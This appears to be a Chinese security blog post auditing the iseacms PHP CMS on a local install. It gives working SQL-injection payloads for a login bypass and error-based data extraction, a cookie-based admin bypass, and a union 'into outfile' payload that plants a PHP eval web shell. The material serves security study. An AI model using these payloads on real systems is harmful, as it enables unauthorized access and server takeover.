iseacms简单审计


0x00 前言

第一次审计cms,粗糙了些,webU•ェ•*U的究极还是代码审计吧,先从简单的开始

0x01 开庭

从网上下载iseacms在本地搭建好,先用seay审计工具来一波
seay

0x02 文件包含(LFI)

第一个就是典型的LFI,本地写个phpinfo试试,可以
LFI
似乎审计工具报的漏洞就这一个能用。。。

0x03 登陆sql注入

翻翻admin
进后台登陆界面,login.php先判断是否存在这个用户,在判断输入的密码的md5与数据库是否一致

  • 万能密码
    ctf里面也考过这个,通过联合查询控制我们想要的pass,上图
    pass
    先查询一个不存在的用户,在联合一个admin,控制pass进行登录,payload:user: yq1ng'union select 1,2,'admin','c4ca4238a0b923820dcc509a6f75849b',5,6,7,8#,pass:1
    user那一串是1的md5
  • 报错注入
    源码没有屏蔽mysql的报错,而是将其输出,试试报错注入
    user: yq1ng'or updatexml(1,concat("~",(select database()),"~"),1)#, pass随意,即可爆出数据库名
    注意:报错回显最多32位,查pass需要截取

0x04 越权?

登陆成功有个setcookie,或许检查存在cookie后就进入后台了?全局搜搜cookie
cookie
只要cookie不为空即可登陆,好耶,直接增加cookie:user:admin值随意,url为http://127.0.0.1/iseacms/admin/?r=index直接进了后台

0x05 getshell

利用登陆页面的报错得知MySQL的安装路径,例如本机为D:\Software\phpstudy_pro\Extensions\MySQL8.0.12得知是PHP study搭建的网站,所以猜测网站路径为D:\Software\phpstudy_pro\WWW\iseacms,写马,开始用报错写不进去,经M3师傅点醒,联合注入写马,payload:login=yes&password=1&user=yq1ng' union select 1,"admin",1,1,1,1,1,'<?php @eval($_POST["yq1ng"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\shell.php'#虽然会报错,但是马儿还是写进去了
getshell

0x06 最后

菜鸡止步于此,本来想试试xss,结果提交后跳到其他地方了,我也懒得改源码了,总的来说审cms挺有意思的,虽然这个比较简单吧,难的就劝退了嘤嘤嘤


文章作者: yq1ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !
评论
 上一篇
ctfshow 代码审计 ctfshow 代码审计
web301 web302 web303 & 304 web305 web306 web307 web308 web309 web310
下一篇 
ROARCTF2020 部分wp ROARCTF2020 部分wp
跟着太空人师傅一队,被带飞,spaceman太强辣!最终取得总积分26名,也得奖了很开心,只是现在还没说奖励是啥哈哈哈,放张图纪念一下嘿嘿 MISC FM WEB ezsql 你能登陆吗&你能登陆吗2
2020-12-06
  目录